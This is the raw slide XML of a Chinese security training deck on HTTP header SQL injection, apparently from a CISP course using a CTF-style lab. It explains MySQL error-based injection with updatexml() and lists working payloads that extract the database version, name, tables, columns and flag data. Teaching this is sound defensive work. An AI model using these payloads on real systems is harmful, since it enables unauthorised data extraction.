            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>这里就要说到接受传参的几种方式了。</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>常见的就是GET传参|POST传参|Cookie传参</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>还有HEAD传参[很多人忽略，其实就是去获取请求头里的内容]</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p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85" y="4696460"/>
            <a:ext cx="9593580" cy="127254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head注入演示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>updatexml()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41070" y="1221740"/>
            <a:ext cx="53378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updatexml() 更新xml文档的函数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67385" y="1705610"/>
            <a:ext cx="65201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语法：updatexml(目标xml内容，xml文档</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路径，更新的内容)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67385" y="2195830"/>
            <a:ext cx="1106487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updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实际上这里是去更新了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文档，但是我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文档路径的位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>里面写入了子查询，我们输入特殊字符，然后就因为不符合输入规则然后报错了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但是报错的时候他其实已经执行了那个子查询代码！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[0x7e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实际是是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进制，但是开头得写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>0x    0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是一个特殊符号，然后不符合路径规则报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>]   ~ ~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https://www.bejson.com/convert/ox2str/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2590" y="4017645"/>
            <a:ext cx="4744720" cy="218884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updatexml()用法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2140" y="1239520"/>
            <a:ext cx="1096835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updatexml () </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这个函数一般是配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用的，他和联合查询不同，不需要在意什么字段数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eg:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	select *from news where id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)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但是要注意，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>情况下只要一个为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，就会判定是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>False,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>所以如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前面的条件不成立的情况下，就不会执行之后的语句。所以使用的时候建议使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>or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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>某些没有回显盲注也可以用这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>updatexml()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>做出来。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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个人经验：有些盲注也可以试试看报错注入，因为有的时候报错注入的致命错误会显示出来，数据库只忽略普通报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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具体代码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5770" y="2136775"/>
            <a:ext cx="1109218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查询数据库版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' or updatexml(1,concat(0x7e,(select version())),1),1) -- qwe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>' or updatexml(1,concat(0x7e,(select database())),1),1)-- adf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查询表名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1) -- qwe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查询字段名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag_head' limit 1,1)),1),1) -- qwe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查询数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 0,1)),1),1) -- qwe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5770" y="1202690"/>
            <a:ext cx="112255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insert into sanhao(name,fenshu) values ('' or updatexml(1,concat(0x7e,(select database())),1),1)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1375" y="1500505"/>
            <a:ext cx="3497580" cy="19659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x272TGp_report_light">
  <a:themeElements>
    <a:clrScheme name="sx272TGp_report_light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A5A5A5"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="449CD8"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="CFCFCF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="3D8DC4"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="19B3B3"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="855ADA"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="sx272TGp_report_light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x272TGp_report_light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x272TGp_report_light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DF6521"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="D7D03B"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="ECB8AB"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="C3BC35"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="188FB4"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="A98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x272TGp_report_light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A5A5A5"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="449CD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3D8DC4"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="19B3B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2138</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>121</Paragraphs>
  <Slides>11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黑体</vt:lpstr>
      <vt:lpstr>方正正粗黑简体</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>sx272TGp_report_light</vt:lpstr>
      <vt:lpstr>等待开课</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Head注入</vt:lpstr>
      <vt:lpstr>等待开课</vt:lpstr>
      <vt:lpstr>本章内容</vt:lpstr>
      <vt:lpstr>HEAD注入原理-什么是head</vt:lpstr>
      <vt:lpstr>head注入演示-updatexml()</vt:lpstr>
      <vt:lpstr>updatexml()用法</vt:lpstr>
      <vt:lpstr>具体代码</vt:lpstr>
      <vt:lpstr>SQLmap如何跑Head注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>中国信息安全测评中心:cisp运营中心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沈传宁</dc:creator>
  <cp:lastModifiedBy>mss</cp:lastModifiedBy>
  <cp:revision>3132</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-30T13:31:01Z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